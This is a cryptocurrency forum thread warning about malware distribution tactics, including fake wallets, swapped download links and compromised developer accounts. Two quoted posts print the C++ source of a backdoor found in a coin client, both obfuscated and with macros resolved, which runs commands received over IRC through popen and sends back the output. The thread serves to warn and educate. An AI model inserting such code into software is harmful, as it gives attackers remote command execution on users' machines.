Pages:
Author

Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 15. (Read 858911 times)

newbie
Activity: 17
Merit: 0
I am a new member, please help
newbie
Activity: 197
Merit: 0
I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
yeah I can understand why you are so annoyed about it
lets hope that they will work out something soon
I think the wallet created by the developers is good. All that is not perfect there must be advantages and disadvantages let alone this online system, so if you do not want to lose your assets, you also have to be careful and careful in storing your assets.
newbie
Activity: 197
Merit: 0
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
Thank you so much for the information I think we all must be more careful when we deal with our money- you have inspired me to review my antivirus
indeed we must always be careful in maintaining our assets. because there are always thieves everywhere. if your assets are gone you can not report where to go because it will be difficult to find him. better prevent before something happens that we do not want.
newbie
Activity: 184
Merit: 0
Bad software scare people the most, I use cash for complete security and I recommend doing so
newbie
Activity: 112
Merit: 0
I really commend your effort in sensitizing forum members, I will also like a continuous update on this all important issue to save from the pains scammers intend to inflict on especially novice like us. Thanks a lot.




copper member
Activity: 33
Merit: 0
I know it can be hard to believe but nobody should be shocked. It happens and we can always increase security, but it will never be 100% secure. Think about it, if someone is smart enough to make it, then that just means there is somebody out there smarter that can break it.
full member
Activity: 392
Merit: 100
I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
yeah I can understand why you are so annoyed about it
lets hope that they will work out something soon
member
Activity: 368
Merit: 10
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
Thank you so much for the information I think we all must be more careful when we deal with our money- you have inspired me to review my antivirus
newbie
Activity: 131
Merit: 0
OMG

i can;t believe this information.
thank you guys.
i will pass the message across.

Thanks
full member
Activity: 392
Merit: 100
Thank you so much! I hope the people who committed that crime will find their punishment! and, of course, poor people who lost their money
newbie
Activity: 48
Merit: 0
I have to say, anything at all on the internet that has money involved, one needs to be careful because there are thieves everywhere, even in our local banks. So I will say keep your passkeys very very secured, You might have police at you local banks, but there's no police here. We don't need them here because our security is in our hands.
full member
Activity: 406
Merit: 106
I just received something like this an hour ago.  I was surfing Ebay and laughed when I saw PimpCash.  Having to see if it was real, I went to pimpcash.com. Immediately something like what you showed came up.  However, for me, it pretended to be my service provider and gave me a number to call.  I confess I did try to call but the ring didn't sound right.  Sounded like an old telephone.  I hung up and rebooted my computer.  Things seem to be ok now.  I ran a quick scan and all seems to be okay.  Is there anything else I should do to check to see if my computer is okay?
full member
Activity: 448
Merit: 100
This sounds really scary, but I guess that where is the money, there are also malversations 
Anyhow, you always need to be careful...

Yeah, I agree. Unfortunately, you cannot trust anyone and should check information twice, and, of course, never give your privare data
full member
Activity: 448
Merit: 100
Could you please post the coin's name and maybe others that you may have found ?
Thank you so much for your information! I have never heard of such things before,and I hope I will never face it. I will share your information with my friends, thanx!
newbie
Activity: 29
Merit: 0
Yup, I’ve been hearing a lot about this lately.
newbie
Activity: 176
Merit: 0
This sounds really scary, but I guess that where is the money, there are also malversations 
Anyhow, you always need to be careful...
newbie
Activity: 104
Merit: 0
Can you please explain how to protect yourself from attacks? Can I put Linux and not survive? or is there a threat anyway?
newbie
Activity: 10
Merit: 0
I think vpn routers can help also to block malwares or attackers..
The safest way to secure your your account is to use vpn.
member
Activity: 224
Merit: 11
I can not understand why the purse is so vulnerable. Why are developers still unable to come up with reliable protection? ((
full member
Activity: 406
Merit: 106
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Pages:
Jump to: